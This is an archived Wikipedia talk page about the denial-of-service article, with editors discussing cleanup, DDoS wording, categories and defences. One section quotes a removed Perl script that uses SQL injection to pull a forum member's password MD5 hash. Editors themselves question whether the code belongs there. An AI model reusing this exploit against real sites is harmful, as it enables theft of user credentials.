Talk:Denial-of-service attack

From Wikipedia, the free encyclopedia

Contents 1 Protected on 2006 April 18 2 Cleanup 3 Rewrote DDoS bit 4 Discussion Points 5 New category 'Computer Network Security' 6 DDos section innacuracies 7 injection is DoS? 7.1 MySQL injection 8 Should there be code offered here? 9 *smirks* 10 Client Puzzle Protocol 11 Effects

[edit] Protected on 2006 April 18

Reason: Vulgarisms or nonsense was continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)

[edit] Cleanup

Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

[edit] Rewrote DDoS bit

Added some references I was bored.

Removed some of the stuff in the prevention and response section it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up some of it was factually wrong, This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section.

218.145.101.210 deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 60.240.174.85 12:28, 24 July 2006 (UTC)

[edit] Discussion Points

I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed easier:

1. Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with. other network protocols exist which benefit rather than degrade with increased scaling of requests. Freenet is one example.
2. The similarity with slashdotting.
3. "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
4. "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
5. Mention of operating system/kernel-level defences
6. Removing the ad-like content towards the bottom along with related ads —The preceding unsigned comment was added by Fintler (talk • contribs).

[edit] New category 'Computer Network Security'

I propose to create a new category 'Computer Network Security' assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)

There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)

[edit] DDos section innacuracies

A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this:

1. "...when multiple compromised systems..." - The systems do not have to be compromised. DDos attacks are just as commonly from groups of willing users who don't realise they aren't anonymous. (ie script kiddies)
2. "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is the a big reason why some like to use tor, to hide their IP from being DDoSed.
3. Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
4. Would we consider a crapflood a DDoS?

Happy editing to all. Michael Billington (talk • contribs) 11:28, 6 August 2006 (UTC)

[edit] injection is DoS?

Should the === MySQL injection === section be in this article? although sql injection can cause a DoS condition, it is not a DoS attack in itself is it? If it is considered a DoS attack, should the code be a little bit more illustrative? it simply displays a general sql injection, not an sql injection that causes a DoS condition.

Overall i feel the section with sourcecode is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talk • contribs) 17:24, 15 August 2006 (UTC).

It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited on my first wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)

Sounds good & welcome Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)

Putting the old section here for now.

[edit] MySQL injection

MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is a malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:

#!perl
#Greetz or begining message of the 404 would go here.
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];
if (@ARGV < 4) {
 print "---------------------------------------------------------\n";
 print "-- This is a MySQL Injection --\n";
 print "-- Coded by Some Hacker --\n";
 print "-- I am a n00b Hacker --\n";
 print "-- Usage: $0 [host] [path] [topic] [id] --\n";
 print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";
 print "---------------------------------------------------------\n";
 exit();
}
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a     connection\n";
print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
            $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
            $cookie = $1;
        }
}
$sock->close;
$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a  connection\n";
print "-- Connection Established --\n";
print $socket "GET   /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";
while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
                 next;
            }
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";
            exit;
       }
}

Coded By: Derek H.

Fedevela 11:26, 16 August 2006 (UTC)

OK! finished editing that section ... i have not tested the code, and i am not positive you can insert EL expressions in the SQL tag like i'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQLInjection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

[edit] Should there be code offered here?

Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)

[edit] *smirks*

The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

[edit] Client Puzzle Protocol

- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talk • contribs) 03:05, 13 December 2006 (UTC).

looks completely useless to me. Most DoS attacks do not require a complete connection to be made so any sort of "puzzle protocol" can't even be started. Wrs1864 03:11, 13 December 2006 (UTC)

[edit] Effects

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. —Ryan 06:54, 6 March 2007 (UTC)